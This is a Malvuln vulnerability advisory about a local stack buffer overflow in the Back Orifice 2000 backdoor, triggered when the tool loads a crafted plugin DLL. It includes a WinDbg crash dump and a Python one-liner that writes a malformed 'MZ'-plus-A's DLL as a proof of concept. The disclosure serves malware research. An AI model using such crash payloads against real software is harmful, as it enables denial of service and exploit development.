Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/abc6a590d237b8ee180638007f67089e.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.BO2K.11.d Vulnerability: Local Stack Buffer Overflow Description: Back Orifice 2000 by Cult of the Dead Cow, stack BOF on corrupted DLL plugin import. Loading a specially crafted (DLL) file triggers a stack buffer overflow overwriting the EDX register. Type: PE32 MD5: abc6a590d237b8ee180638007f67089e Vuln ID: MVID-2021-0328 ASLR: False DEP: False Safe SEH: True Disclosure: 08/30/2021 Memory Dump: (ef4.bec): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=07aa0000 edx=41414141 esi=00000003 edi=00000003 eip=76fced3c esp=0019e42c ebp=0019e5bc iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202 ntdll!ZwWaitForMultipleObjects+0xc: 76fced3c c21400 ret 14h 0:000> .ecxr eax=07aa0000 ebx=00000001 ecx=07aa0000 edx=41414141 esi=00437400 edi=0019faa4 eip=00403f9a esp=0019ed4c ebp=0019ed7c iopl=0 nv up ei ng nz na pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210287 *** WARNING: Unable to verify checksum for Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e Backdoor_Win32_BO2K_11_d+0x3f9a: 00403f9a 813c1050450000 cmp dword ptr [eax+edx],4550h ds:002b:48eb4141=???????? 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: Backdoor_Win32_BO2K_11_d+3f9a 00403f9a 813c1050450000 cmp dword ptr [eax+edx],4550h EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00403f9a (Backdoor_Win32_BO2K_11_d+0x00003f9a) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 48eb4141 Attempt to read from address 48eb4141 PROCESS_NAME: Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e OVERLAPPED_MODULE: Address regions for 'iertutil' and 'audiodev.dll' overlap ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 48eb4141 READ_ADDRESS: 48eb4141 FOLLOWUP_IP: Backdoor_Win32_BO2K_11_d+3f9a 00403f9a 813c1050450000 cmp dword ptr [eax+edx],4550h MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00000bec BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 00404754 to 00403f9a STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0019ed7c 00404754 07aa0000 0019edb9 00000000 Backdoor_Win32_BO2K_11_d+0x3f9a 0019eeb0 004047a0 02765a20 00000000 00000000 Backdoor_Win32_BO2K_11_d+0x4754 0019eec4 004100f3 02765a20 0019faa4 00000001 Backdoor_Win32_BO2K_11_d+0x47a0 0019eee0 00410578 02765a20 0019faa4 00437400 Backdoor_Win32_BO2K_11_d+0x100f3 0019f350 00420f60 00437400 00000111 0019f390 Backdoor_Win32_BO2K_11_d+0x10578 0019f360 004210ed 0019faa4 00000003 00000000 Backdoor_Win32_BO2K_11_d+0x20f60 0019f390 0041fb67 00000003 00000000 00000000 Backdoor_Win32_BO2K_11_d+0x210ed 0019f3b4 00422d5e 00000003 00000000 00000000 Backdoor_Win32_BO2K_11_d+0x1fb67 0019f404 0042279a 00000000 000d0392 0019faa4 Backdoor_Win32_BO2K_11_d+0x22d5e 0019f480 0042274c 00000111 00000003 000d0392 Backdoor_Win32_BO2K_11_d+0x2279a 0019f4a0 004217b2 00000111 00000003 000d0392 Backdoor_Win32_BO2K_11_d+0x2274c 0019f500 004219ba 00000000 000907d4 00000111 Backdoor_Win32_BO2K_11_d+0x217b2 0019f51c 76d7e0bb 000907d4 00000111 00000003 Backdoor_Win32_BO2K_11_d+0x219ba 0019f548 76d88849 0042198f 000907d4 00000111 user32!_InternalCallWinProc+0x2b 0019f56c 76d8b145 00000111 00000003 000d0392 user32!InternalCallWinProc+0x20 0019f63c 76d8a89c 0042198f 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be 0019f6a8 76d6b95b 02cafd10 00000000 000d0392 user32!SendMessageWorker+0x6ff 0019f6d0 76d85493 000907d4 00000111 00000003 user32!SendMessageW+0x5b 0019f6f8 76d84dda 02c6eaa0 00000000 00000000 user32!xxxButtonNotifyParent+0x66 0019f720 76d84240 027a4f38 00000000 02c6eaa0 user32!xxxBNReleaseCapture+0x150 0019f7b8 76d836c6 02c6eaa0 00000000 00000202 user32!ButtonWndProcWorker+0xad0 0019f7ec 76d7e0bb 000d0392 00000202 00000000 user32!ButtonWndProcA+0x56 0019f818 76d88849 76d83670 000d0392 00000202 user32!_InternalCallWinProc+0x2b 0019f83c 76d8b145 00000202 00000000 00100022 user32!InternalCallWinProc+0x20 0019f90c 76d790dc 87d9fbc0 00007ff9 00000202 user32!UserCallWinProcCheckWow+0x1be 0019f978 76d6b2ee 00000000 00442ba0 00442b98 user32!DispatchMessageWorker+0x4ac 0019f9a8 76d6b0cc 000907d4 00442b98 00442b98 user32!IsDialogMessageW+0x17e 0019f9dc 0042444a 000907d4 00442b98 0019faa4 user32!IsDialogMessageA+0x13c 00442b98 00000000 00000000 00100022 005f107c Backdoor_Win32_BO2K_11_d+0x2444a STACK_COMMAND: ~0s; .ecxr ; kb SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: Backdoor_Win32_BO2K_11_d+3f9a FOLLOWUP_NAME: MachineOwner MODULE_NAME: Backdoor_Win32_BO2K_11_d IMAGE_NAME: Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e DEBUG_FLR_IMAGE_TIMESTAMP: 3dcbc5d0 BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_BO2K_11_d+3f9a FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e!Unknown Exploit/PoC: 1) Create new server 2) Plugins/Configure/Plugin Configuration/insert 3) python -c "print('MZ'+'A'*10000)" > BOOM.dll 4) Load the corrupt DLL Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).